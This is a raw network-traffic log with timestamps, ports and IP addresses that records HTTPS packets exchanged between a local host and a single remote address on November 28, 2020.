Nov 28, 2020 10:25:11.246085882 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246120930 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246143103 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246165991 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246189117 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246211052 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246234894 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246258974 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246282101 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246304989 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246326923 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246356010 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246377945 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246401072 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246423006 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246453047 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246484041 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246512890 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246541023 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246572018 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246608019 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246648073 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246676922 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246706009 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246735096 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246763945 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246792078 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246820927 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246855974 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246887922 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246917009 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246946096 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.246974945 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247003078 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247030973 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247060061 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247096062 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247128010 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247155905 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247179031 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247206926 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247241020 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247272015 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247301102 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247329950 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247359037 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247386932 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247415066 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247442961 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247478962 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247510910 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247539043 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247575045 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247602940 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247631073 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247661114 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247688055 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247723103 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247754097 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247781992 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247809887 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247837067 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247864962 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247893095 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247920990 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247955084 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.247986078 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248014927 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248044014 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248071909 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248100996 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248130083 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248158932 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248193026 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248225927 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248254061 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248282909 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248311996 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248347044 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248378038 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248405933 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248434067 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248462915 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248491049 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248519897 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.248548031 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.251920938 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.252207994 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.252336025 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.252702951 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.253303051 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.268429041 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.268481970 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.268523932 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.268562078 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.268619061 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.268641949 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.268682003 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.268728018 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.268791914 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.268793106 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.268842936 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.268858910 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.268907070 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.268971920 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.268981934 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269022942 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269088030 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.269100904 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269146919 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269185066 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269242048 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.269263029 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269308090 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269371986 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.269402981 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269459963 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.269476891 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269519091 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269573927 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.269589901 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269665003 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269709110 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269753933 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.269787073 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269885063 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.269896030 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.269941092 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270034075 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.270036936 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270083904 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270124912 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270174980 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.270195007 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270262003 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.270333052 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270382881 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270426989 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270467043 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270498037 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.270560026 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270585060 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.270602942 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270668983 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270668983 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.270716906 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270782948 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.270796061 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270839930 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270879030 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270951033 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.270957947 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.270992994 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271061897 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.271065950 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271136045 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271176100 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271188974 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.271245956 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.271254063 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271298885 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271336079 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271383047 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271390915 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.271428108 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271454096 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.271466970 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271507025 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271542072 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.271545887 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271576881 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271598101 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.271617889 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271657944 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271688938 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.271697998 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271737099 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271764994 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271800995 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.271802902 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271835089 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.271842957 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271889925 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271904945 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.271933079 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.271971941 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272011042 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272042036 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272082090 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.272089005 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272133112 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272178888 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272198915 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.272227049 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272272110 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272285938 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.272310972 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272351027 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272370100 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.272391081 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272429943 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272448063 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.272469044 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272507906 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272506952 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.272557020 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272563934 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.272600889 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272639036 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272654057 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.272680044 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272720098 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272758007 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272770882 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.272795916 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.272798061 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272838116 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272885084 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272918940 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.272928953 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272969007 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.272970915 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.273008108 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273047924 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273052931 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.273087025 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273128033 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273140907 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.273156881 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273204088 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.273205042 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273250103 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273289919 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273302078 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.273332119 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273370981 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273377895 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.273436069 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273475885 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273494959 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.273516893 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273557901 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273562908 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.273606062 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273649931 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273689032 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273730040 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.273730040 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273760080 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.273773909 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273813009 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273852110 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273865938 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.273894072 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273894072 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.273941994 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273986101 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.273993015 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274024010 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274044037 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274065018 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274105072 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274117947 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274144888 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274148941 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274183989 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274221897 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274235010 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274267912 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274270058 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274315119 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274353981 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274394035 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274411917 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274435043 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274449110 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274475098 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274487972 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274513960 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274518967 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274553061 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274555922 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274600029 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274646044 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274665117 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274686098 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274724960 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274733067 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.274765968 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.274835110 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.291157961 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.291214943 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.291311979 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.291347027 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.292124033 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292166948 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292202950 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292237997 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292273045 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292285919 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.292305946 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.292308092 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292310953 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.292339087 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292373896 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.292376995 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292412996 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292413950 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.292443037 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292457104 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.292479038 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.292510986 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.292843103 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292881966 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292917967 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292948008 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.292957067 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.292994976 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.293040037 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.293078899 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.293116093 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.293150902 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.293186903 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.293220997 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.293256044 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.293288946 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.293291092 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.293296099 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.293298960 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.293302059 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.293306112 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.293334961 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.293334961 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.293342113 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.293364048 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.293375015 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.293401003 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.293483973 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.308756113 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.308821917 CET	443	49734	162.159.135.233	192.168.2.6
